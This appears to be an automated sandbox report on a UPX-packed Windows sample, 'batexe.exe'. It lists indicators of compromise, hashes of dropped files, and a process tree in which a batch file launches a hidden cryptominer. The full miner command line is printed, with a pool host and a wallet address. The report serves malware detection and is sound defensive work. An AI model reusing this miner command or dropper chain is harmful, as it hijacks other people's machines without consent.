73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
20/02/2024, 05:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3320	b2e.exe
4908	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4908	cpuminer-sse2.exe
4908	cpuminer-sse2.exe
4908	cpuminer-sse2.exe
4908	cpuminer-sse2.exe
4908	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4888-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4888 wrote to memory of 3320	4888	batexe.exe	74
PID 4888 wrote to memory of 3320	4888	batexe.exe	74
PID 4888 wrote to memory of 3320	4888	batexe.exe	74
PID 3320 wrote to memory of 2264	3320	b2e.exe	75
PID 3320 wrote to memory of 2264	3320	b2e.exe	75
PID 3320 wrote to memory of 2264	3320	b2e.exe	75
PID 2264 wrote to memory of 4908	2264	cmd.exe	78
PID 2264 wrote to memory of 4908	2264	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4888
- C:\Users\Admin\AppData\Local\Temp\CB8D.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\CB8D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\CB8D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D0AE.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2264
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CB8D.tmp\b2e.exe

Filesize
2.4MB

MD5
000f75482a8f3c361e1ef9b58a16ee5f

SHA1
4e67fd460b9fa59dc5c1147833ad2f40f94d0279

SHA256
5143fc3449d84ea5cf510321dc92e2e28e68385863a6b07da646a406b53a875e

SHA512
fe72c633e123cea33c480746a4534fe6228f2c1f6184edbc75c144a201fb556ba0d68415c2abaa9c844a39bb900300f24476e38a4e13825829da54d629eaf152

Download Submit
C:\Users\Admin\AppData\Local\Temp\CB8D.tmp\b2e.exe

Filesize
2.2MB

MD5
998e9301dce0fbf032fca9df021fc4ae

SHA1
f503ee26148291430af85f8446e0f57be9aaffe4

SHA256
b369c8213fb912e0b3897919430a7d1d5df34cc0fec88831ed704eaa103a6c69

SHA512
6c8e0ae1c074762bd85e7d6882b2e1925def81670ada77624c5f8a63b4cb1e48ddc62f67b9c933a31b0a3ba0be87fae07229c92ca1a1b34bd7910e246ea4a0e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\D0AE.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
768KB

MD5
7511ee8c66d17030a4f24226caa425c7

SHA1
aa5bb6b2306f01ac82133f54ec36ca2491fb1911

SHA256
e9ad1acfa96a3be152713809498617dacb74878ed3ac3ed4e5b1455cf1fa5ac5

SHA512
4838197b397552aa7c22ca54d27ec420df0629689e111c40068480f5e37879bfbc89c84245ae8b0a6b4a16ee7d75197403153151eccbbe468b252f508e8466ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
640KB

MD5
0f6af9e19fa927d88313e98d54420920

SHA1
0aff9c72864126107d6c630aafb9ed6512042afd

SHA256
71661d7077b93e2a5e53d7093e532bec1b66d34e3929bcb314eab7f431b84734

SHA512
bba078e2f4eb5ca45956657356f7419767a81679f34d9991bf28a1d44e412340d1002517f74a15583ffe20b32f1f25b60c47f4581100552dc1e651b3f88547be

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
704KB

MD5
538d0a2af59454daf4418e27268ec013

SHA1
dd5e047f232d3827ba6f9c1da4f17928557dd6e6

SHA256
ef618dca52a4f65f6fd72fd721744185c44cfeff6ff90928f56481969eab4126

SHA512
1c958d315013726aa6ebc24552fb4d712a30ad6e5621db0f9037924ccb8cdf45063a01ed6da3aa50485ad084248a9c67c3513aabecf9d324eacaaa2b75f0a7c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
704KB

MD5
ceb1ee23d68e973e400b41e7324c71b6

SHA1
0ad5540864cf9bcbf52870ba72566625ca54e67a

SHA256
66f2f5bd30986e28a4c43ed44264cc56f63bd7a3ecd6aeb5845ac7bcd724aeee

SHA512
51ce4a101517339cb1f5c23fc953dde73f871cec2bde8ea5c9fad9376366d7b8aadaa8668ef2f7bf9d873e8817345e4e337a7a94c42c3ddf6a168377af060e9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
576KB

MD5
2caab2ad7ccd18421c96ea2ef5b9e602

SHA1
a629673c12e88ef88f30cbe8da12d3afb9a7d42c

SHA256
c16fbf658c970a716b976abe7c5d9f1b1a42dacd55a43b16fec0ecc6b84f0552

SHA512
aa9692584947d7fdbe843e877430ade40c5b4c6e15887005a292065d6f8e1303abc8dfc2bf50c01fb032bdfeca5bb2aa9312ba44d7ba4e2d3529d07bfd008969

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
640KB

MD5
ac7d1c3bb4d3c69372907331267c1ee7

SHA1
fa82689799785ef9ab4c304b1c1a6d2d9a961928

SHA256
d22689ab67764158df7b19e8d78ec1393899f21e390f469a300975a31106c3aa

SHA512
0d541661060d7c5eed486ea0377142e7d3883b3c0935114679af28bcae0b1767585fe06328955cf59aab4fe3d4acfba525dbc42675fbce80b7d0b2300784d125

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
768KB

MD5
fe316f2b417e142dffa0e03efb65e1a4

SHA1
907805b2c3bc0a0791086cb5fc8e3a950bc78e6d

SHA256
aca06866767d9e0bbe1e9bef7efce1152d34243e1acefc5f7ac4f6a245456671

SHA512
8ebfa0700b00c4064d1ded11fc1b4001f01238ee0c4cf88a873e0ccf38c30a574d600649bfdef85f2e3aec5c279a43680f7a66604bc6f27bbda0219e3786774d

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
448KB

MD5
ca123cec7f705c0af114e462349dc686

SHA1
75f90b4d95f6774b2f66e4ba790755ef118ab222

SHA256
7f141cdc0be9c965e21310bcfb0484b20d31ffd8a6a970f8b5a53c0e8974798a

SHA512
650125faa9ae6733f1118caf3101ca6850473f78f9bfc3a87e908eac1c69935e3bc269ffb5de4dd6e867429c1af35c7f3b9e62eb698fa7c9695d68e7115f3f1c

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
512KB

MD5
a3dea3777f14f1235327b648410a9406

SHA1
9ab139a0c947962b3c471c36e8b9cca4d750c889

SHA256
ff432926dd375c44e9a86cc2520c46e66be2d212e35fb73f16ebc4b48b98b6d1

SHA512
b6cacf9e5d8adebdb3c4ae9b6eaddda6a90d9eae32bdc4cf6eb36ad7cf14d02486ac0c32942e3bc504e943a544fa71a6c9e2fec8fb07c456290646107b4edea2

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
512KB

MD5
5fd46a66845c804b88dcd97ffcd66652

SHA1
9556ce5607bdd245c8e4d6a24b8217def653f57b

SHA256
b7fd85a2268a4d62fa15fde3d9e51d6fa3bc865cb4d8e5fdca309be7b027f193

SHA512
0896697d588401a6d29c30e77574ece4f0ba699b082b1bad93964748313a5903eb4994ec81c61bfcbd75f2be3f5200dadda3fd1454381cc5874a9c8952ebeedc

Download Submit
memory/3320-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3320-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4888-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4908-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4908-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-43-0x0000000072600000-0x0000000072698000-memory.dmp

Filesize
608KB

Download
memory/4908-44-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/4908-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4908-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4908-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download